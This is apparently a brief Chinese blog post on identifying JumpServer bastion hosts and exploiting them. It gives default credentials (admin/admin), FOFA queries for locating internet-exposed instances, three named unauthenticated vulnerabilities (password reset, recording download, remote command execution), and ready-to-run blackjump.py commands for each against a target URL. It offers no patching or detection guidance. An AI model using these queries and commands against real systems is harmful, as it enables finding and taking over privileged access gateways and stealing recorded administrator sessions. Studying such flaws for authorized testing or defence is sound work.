JumpServer堡垒机特征及漏洞复现
Jumpserver是一个开源堡垒机系统。
Web特征
该产品访问8080(可变)即可导向默认界面路径 /core/auth/login/:
通过默认账户密码即可登录(但第一次登录后就会要求修改):admin/admin
还存在其他路径,比如Web Terminal 前端组件 Luna 的访问路径(需要登录):/luna/
存在默认icon:

标题一般存在内容:JumpServer 开源堡垒机
fofa语法:app="JumpServer"、path="/core/auth/login/"、title="JumpServer"、header="JMS-SESSION"
漏洞复现
目前已公开的可利用高危漏洞:
- 未授权任意用户密码重置 (CVE-2023-42820)
- 未授权一键下载所有操作录像 (CVE-2023-42442)
- 未授权任意命令执行漏洞 (RCE 2021)
python3 blackjump.py reset https://target-ip
python3 blackjump.py dump https://target-ip
python3 blackjump.py rce http(s)://target-ip
可以使用blackjump工具自动化利用,如CVE-2023-42820:


浙公网安备 33010602011771号